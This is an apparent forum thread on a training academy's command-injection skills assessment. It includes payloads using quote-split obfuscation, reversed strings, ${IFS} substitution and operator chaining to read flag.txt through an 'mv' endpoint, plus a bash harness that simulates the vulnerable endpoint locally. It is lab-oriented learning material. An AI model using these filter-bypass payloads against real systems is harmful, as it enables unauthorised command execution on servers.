Academy command injection skills assessment


I am trying to solve the Command Injection Skills Assessment.
I have tried the payloads below but I am unable to solve it. Could anyone guide me to solve this?

Parameter: from
Payload: 696212415.txt&&w'h'o'am'i
$(rev<<<'txt.galf/. tac')

Error while moving: mv: missing destination file operand after ‘/var/www/html/files/696212415.txt’
Try ‘mv --help’ for more information.

You are trying to inject into a command like mv from to.

The Unix mv needs two arguments, from and to. You must create a code injection which yields a valid mv command call followed by the command you would like to execute.

You can develop the needed arguments with a local bash, like:

mv $from $to

If the arguments for from and to work locally, then you can test the bash command injection on the server.

Hi Xtal,

Thank you for the information, I have solved the assessment.
You need to identify the working injection operator (|| or && or & or $() or ;) and then find the proper payload to read the flag.txt (use o'bf'usc'at'ion or proper encoding, and replace the filtered characters with environment variables or alternate characters).
Sometimes the content of the flag.txt will appear within the error message.
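The local testing that Xtal suggests, combined with the operator and obfuscation hints from Appsec, can be turned into a small bash harness. This is an added example written for this thread, not the Academy application's code: the wrapper assumes the endpoint splices both parameters unquoted into a shell string (which is what the "missing destination file operand" error suggests), the flag.txt content and the temporary directory are constructed here, and the payload names are my own. It reproduces the error from the question and then shows why a payload that first gives mv its second operand succeeds.

```bash
#!/usr/bin/env bash
# Local harness for developing an "mv from to" command-injection payload.
# Constructed example for this thread, not the Academy application's code.
# ASSUMPTION: the real endpoint interpolates both parameters into a shell
# string without quoting, so metacharacters in them are parsed by the shell.

# Simulated vulnerable endpoint: both arguments are attacker-controlled.
vuln_move() {               # $1 = from, $2 = to
    local from="$1" to="$2"
    LC_ALL=C bash -c "mv $from $to" 2>&1
}

# Run one payload pair inside a throwaway directory holding a stand-in
# flag.txt and the file the app expects to move; print whatever the shell
# produced (stdout and stderr, like an error message reflected by the app).
try_payload() {             # $1 = from payload, $2 = to payload
    local dir
    dir=$(mktemp -d)
    printf 'FLAG{constructed}\n' > "$dir/flag.txt"   # constructed target
    : > "$dir/696212415.txt"                          # file name from the thread
    ( cd "$dir" && vuln_move "$1" "$2" ) || true      # keep going on mv errors
    rm -rf "$dir"
}

# The payload from the question: mv receives only one operand and fails, and
# because the operator is && the injected command never runs.
PAYLOAD_BROKEN="696212415.txt&&w'h'o'am'i"

# Satisfy mv first (two operands, the space replaced by ${IFS} in case spaces
# are filtered), then use ; so the injected command runs regardless of mv's
# exit status. Quote-splitting (c"a"t) is the same keyword-filter bypass as
# w'h'o'am'i; the shell strips the quotes before executing.
PAYLOAD_IFS='696212415.txt${IFS}moved.txt;c"a"t${IFS}flag.txt'

# Same idea using the reversed-string trick from the question; needs rev(1).
PAYLOAD_REV='696212415.txt${IFS}moved.txt;$(rev<<<"txt.galf tac")'

# Named wrappers so each case can be checked individually.
run_broken() { try_payload "$PAYLOAD_BROKEN" ""; }
run_ifs()    { try_payload "$PAYLOAD_IFS" ""; }
run_rev()    { try_payload "$PAYLOAD_REV" ""; }

echo "--- broken payload (mv fails, whoami never runs) ---"; run_broken
echo "--- IFS payload (mv succeeds, then cat runs) ---";     run_ifs
echo "--- rev payload ---";                                  run_rev
```

The first run prints the same "mv: missing destination file operand" error as the question, with no whoami output; the other two print the stand-in flag. Once a from/to pair behaves locally, the same strings go into the intercepted request.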


Hi Appsec,

Currently working on this one, just keep getting hit with 302s so not sure where any purchase is. Do you know if I can use either download, copy, or move - will intercepting and injecting any of these commands work, or is there a specific one that’s the way in and if so do you know why? Thanks!

@Appsec Your hints helped me to get “flag.txt” :grin:

Any tips about how to find the injection point?

The input parameter is the injection point.


Thanks, this hint helped me a lot.

After you identify the vulnerable API endpoint, you will see that the error message contains something you can control. Then why not just put the flag there? Use the technique you've learned before; it just works.

By the way, if you try to do something to some folder, then you could download the source code of this vulnerable application.